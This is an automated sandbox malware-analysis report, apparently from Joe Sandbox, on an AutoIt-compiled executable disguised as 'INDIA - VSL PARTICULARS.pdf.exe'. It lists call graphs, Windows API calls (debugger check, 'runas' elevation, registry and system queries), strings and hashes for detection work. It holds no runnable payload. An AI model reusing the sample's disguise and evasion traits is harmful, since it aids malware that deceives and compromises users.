88369->88370 88371 4750ee 88370->88371 88372 475129 88370->88372 88373 408f40 VariantClear 88371->88373 88419 4646e0 88372->88419 88379 4750f5 88373->88379 88375 47515e 88376 475162 88375->88376 88403 47518e 88375->88403 88378 408f40 VariantClear 88376->88378 88377 475357 88380 475365 88377->88380 88381 4754ea 88377->88381 88399 475169 88378->88399 88379->88235 88453 44b3ac 57 API calls 88380->88453 88459 464812 91 API calls 88381->88459 88385 475374 88432 430d31 88385->88432 88386 4754fc 88386->88385 88388 475508 88386->88388 88387 4533eb 85 API calls 88387->88403 88389 408f40 VariantClear 88388->88389 88391 47550f 88389->88391 88391->88399 88392 475388 88396 475480 88398 408f40 VariantClear 88396->88398 88398->88399 88399->88235 88403->88377 88403->88387 88403->88396 88408 4754b5 88403->88408 88451 436299 52 API calls 2 library calls 88403->88451 88452 463ad5 64 API calls __wcsicoll 88403->88452 88409 408f40 VariantClear 88408->88409 88409->88399 88462 4536f7 53 API calls 88419->88462 88421 4646fc 88463 4426cd 59 API calls _wcslen 88421->88463 88423 464711 88425 40bc70 52 API calls 88423->88425 88431 46474b 88423->88431 88426 46472c 88425->88426 88464 461465 52 API calls _memmove 88426->88464 88428 464741 88430 40c600 52 API calls 88428->88430 88429 464793 88429->88375 88430->88431 88431->88429 88465 463ad5 64 API calls __wcsicoll 88431->88465 88433 430db2 88432->88433 88434 430d54 88432->88434 88433->88392 88435 4115d7 52 API calls 88434->88435 88451->88403 88452->88403 88453->88385 88459->88386 88462->88421 88463->88423 88464->88428 88465->88429 88467->87909 88468->88001 88469->87924 88470->87972 88471->88034 88472->87972 88473->87972 88474->87945 88475->87969 88476->87936 88477->87940 88478->87946 88479->88004 88480->88004 88481->88004 88482->87962 88483->87926 88484->87963 88485->87991 88486->88012 88487->88012 88488->88001 88489->88016 88490->88028 88491->88022 88492->88030 88493->88037 88494->88037 88495->87926 88496->87930 88497 42d154 88501 480a8d 88497->88501 88499 42d161 88500 480a8d 192 API calls 88499->88500 88500->88499 88502 480ae4 88501->88502 88503 480b26 88501->88503 88504 480aeb 88502->88504 88505 480b15 88502->88505 88506 40bc70 52 API calls 88503->88506 88507 480aee 88504->88507 88508 480b04 88504->88508 88534 4805bf 192 API calls 88505->88534 88525 480b2e 88506->88525 88507->88503 88510 480af3 88507->88510 88533 47fea2 192 API calls __itow_s 88508->88533 88532 47f135 192 API calls 88510->88532 88513 40e0a0 52 API calls 88513->88525 88515 408f40 VariantClear 88517 481156 88515->88517 88516 480aff 88516->88515 88518 408f40 VariantClear 88517->88518 88519 48115e 88518->88519 88519->88499 88520 401980 53 API calls 88520->88525 88522 40c2c0 52 API calls 88522->88525 88523 40e710 53 API calls 88523->88525 88524 40a780 192 API calls 88524->88525 88525->88513 88525->88516 88525->88520 88525->88522 88525->88523 88525->88524 88527 408e80 VariantClear 88525->88527 88528 480ff5 88525->88528 88535 45377f 52 API calls 88525->88535 88536 45e951 53 API calls 88525->88536 88537 40e830 53 API calls 88525->88537 88538 47925f 53 API calls 88525->88538 88539 47fcff 192 API calls 88525->88539 88527->88525 88540 45e737 90 API calls 3 library calls 88528->88540 88532->88516 88533->88516 88534->88516 88535->88525 88536->88525 88537->88525 88538->88525 88539->88525 88540->88516 88541 42b14b 88548 40bc10 88541->88548 88543 42b159 88544 4096a0 329 API calls 88543->88544 88545 42b177 88544->88545 88559 44b92d VariantClear 88545->88559 88547 42bc5b 88549 40bc24 88548->88549 88550 40bc17 88548->88550 88552 40bc2a 88549->88552 88553 40bc3c 88549->88553 88551 408e80 VariantClear 88550->88551 88555 40bc1f 88551->88555 88556 408e80 VariantClear 88552->88556 88554 4115d7 52 API calls 88553->88554 88558 40bc43 88554->88558 88555->88543 88557 40bc33 88556->88557 88557->88543 88558->88543 88559->88547 88560 425b2b 88565 40f000 88560->88565 88564 425b3a 88566 4115d7 52 API calls 88565->88566 88567 40f007 88566->88567 88568 4276ea 88567->88568 88574 40f030 88567->88574 88573 41130a 51 API calls __cinit 88573->88564 88575 40f039 88574->88575 88576 40f01a 88574->88576 88604 41130a 51 API calls __cinit 88575->88604 88578 40e500 88576->88578 88579 40bc70 52 API calls 88578->88579 88580 40e515 GetVersionExW 88579->88580 88581 402160 52 API calls 88580->88581 88582 40e557 88581->88582 88605 40e660 88582->88605 88588 427674 88592 4276c6 GetSystemInfo 88588->88592 88590 40e5e0 88594 4276d5 GetSystemInfo 88590->88594 88619 40efd0 88590->88619 88591 40e5cd GetCurrentProcess 88626 40ef20 LoadLibraryA GetProcAddress 88591->88626 88592->88594 88597 40e629 88623 40ef90 88597->88623 88600 40e641 FreeLibrary 88601 40e644 88600->88601 88602 40e653 FreeLibrary 88601->88602 88603 40e656 88601->88603 88602->88603 88603->88573 88604->88576 88606 40e667 88605->88606 88607 42761d 88606->88607 88608 40c600 52 API calls 88606->88608 88609 40e55c 88608->88609 88610 40e680 88609->88610 88611 40e687 88610->88611 88612 427616 88611->88612 88613 40c600 52 API calls 88611->88613 88614 40e566 88613->88614 88614->88588 88615 40ef60 88614->88615 88616 40e5c8 88615->88616 88617 40ef66 LoadLibraryA 88615->88617 88616->88590 88616->88591 88617->88616 88618 40ef77 GetProcAddress 88617->88618 88618->88616 88620 40e620 88619->88620 88621 40efd6 LoadLibraryA 88619->88621 88620->88592 88620->88597 88621->88620 88622 40efe7 GetProcAddress 88621->88622 88622->88620 88627 40efb0 LoadLibraryA GetProcAddress 88623->88627 88625 40e632 GetNativeSystemInfo 88625->88600 88625->88601 88626->88590 88627->88625 88628 3f1f878 88642 3f1d4c8 88628->88642 88630 3f1f962 88646 3f1f768 88630->88646 88643 3f1d53b 88642->88643 88649 3f209a8 GetPEB 88643->88649 88645 3f1db53 88645->88630 88647 3f1f771 Sleep 88646->88647 88648 3f1f77f 88647->88648 88650 3f209d2 88649->88650 88650->88645 88651 425b5e 88656 40c7f0 88651->88656 88655 425b6d 88691 40db10 52 API calls 88656->88691 88658 40c82a 88692 410ab0 6 API calls 88658->88692 88660 40c86d 88661 40bc70 52 API calls 88660->88661 88662 40c877 88661->88662 88663 40bc70 52 API calls 88662->88663 88664 40c881 88663->88664 88665 40bc70 52 API calls 88664->88665 88666 40c88b 88665->88666 88667 40bc70 52 API calls 88666->88667 88668 40c8d1 88667->88668 88669 40bc70 52 API calls 88668->88669 88670 40c991 88669->88670 88693 40d2c0 52 API calls 88670->88693 88672 40c99b 88694 40d0d0 53 API calls 88672->88694 88674 40c9c1 88675 40bc70 52 API calls 88674->88675 88676 40c9cb 88675->88676 88695 40e310 53 API calls 88676->88695 88678 40ca28 88679 408f40 VariantClear 88678->88679 88680 40ca30 88679->88680 88681 408f40 VariantClear 88680->88681 88682 40ca38 GetStdHandle 88681->88682 88683 429630 88682->88683 88684 40ca87 88682->88684 88683->88684 88685 429639 88683->88685 88690 41130a 51 API calls __cinit 88684->88690 88696 4432c0 57 API calls 88685->88696 88687 429641 88697 44b6ab CreateThread 88687->88697 88689 42964f CloseHandle 88689->88684 88690->88655 88691->88658 88692->88660 88693->88672 88694->88674 88695->88678 88696->88687 88697->88689 88698 44b5cb 58 API calls 88697->88698 88699 425b6f 88704 40dc90 88699->88704 88703 425b7e 88705 40bc70 52 API calls 88704->88705 88706 40dd03 88705->88706 88713 40f210 88706->88713 88708 426a97 88710 40dd96 88710->88708 88711 40ddb7 88710->88711 88716 40dc00 52 API calls 2 library calls 88710->88716 88712 41130a 51 API calls __cinit 88711->88712 88712->88703 88717 40f250 RegOpenKeyExW 88713->88717 88715 40f230 88715->88710 88716->88710 88718 425e17 88717->88718 88719 40f275 RegQueryValueExW 88717->88719 88718->88715 88720 40f2c3 RegCloseKey 88719->88720 88721 40f298 88719->88721 88720->88715 88722 40f2a9 RegCloseKey 88721->88722 88723 425e1d 88721->88723 88722->88715

                              Executed Functions

                              Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 004096C1
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 0040970C
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                              • _memmove.LIBCMT ref: 00409D96
                              • _memmove.LIBCMT ref: 0040A6C4
                              • _memmove.LIBCMT ref: 004297E5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                              • String ID:
                              • API String ID: 2383988440-0
                              • Opcode ID: a06cd1955fce2694f18b8147bf75f67824b193f3afcae0e29f98764ad8f97a23
                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                              • Opcode Fuzzy Hash: a06cd1955fce2694f18b8147bf75f67824b193f3afcae0e29f98764ad8f97a23
                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                              Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                              • String ID: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                              • API String ID: 2495805114-2143918303
                              • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                              • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                              Function 0040E500 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1915 40e585-40e596 1913->1915 1916 40e5ba-40e5cb call 40ef60 1913->1916 1917 427683-427686 1914->1917 1918 42767b-427681 1914->1918 1920 427625-427629 1915->1920 1921 40e59c-40e59f 1915->1921 1935 40e5ec-40e60c 1916->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1916->1936 1922 427693-427696 1917->1922 1923 427688-427691 1917->1923 1919 4276b4-4276be 1918->1919 1937 4276c6-4276ca GetSystemInfo 1919->1937 1929 427636-427640 1920->1929 1930 42762b-427631 1920->1930 1925 40e5a5-40e5ae 1921->1925 1926 427654-427657 1921->1926 1922->1919 1927 427698-4276a8 1922->1927 1923->1919 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1916 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1916 1930->1916 1931->1916 1932->1916 1933->1919 1934->1919 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1916 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                              APIs
                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                              • String ID: 0SH$#v
                              • API String ID: 3363477735-2448020801
                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                              Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: IsThemeActive$uxtheme.dll
                              • API String ID: 2574300362-3542929980
                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                              Function 0040D6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FreeInfoLibraryParametersSystem
                              • String ID: #v
                              • API String ID: 3403648963-554117064
                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                              Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                              Download Yara Rule
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchSleepTranslate
                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                              • API String ID: 1762048999-758534266
                              • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                              • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                              Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • __wcsicoll.LIBCMT ref: 00402007
                              • __wcsicoll.LIBCMT ref: 0040201D
                              • __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                              • __wcsicoll.LIBCMT ref: 00402049
                              • _wcscpy.LIBCMT ref: 0040207C
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,00000104), ref: 00428B5B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe$CMDLINE$CMDLINERAW
                              • API String ID: 3948761352-527741675
                              • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                              • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                              • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                              • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                              Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fread_nolock$_fseek_wcscpy
                              • String ID: D)E$D)E$FILE
                              • API String ID: 3888824918-361185794
                              • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                              • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                              Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                              • __wsplitpath.LIBCMT ref: 0040E41C
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcsncat.LIBCMT ref: 0040E433
                              • __wmakepath.LIBCMT ref: 0040E44F
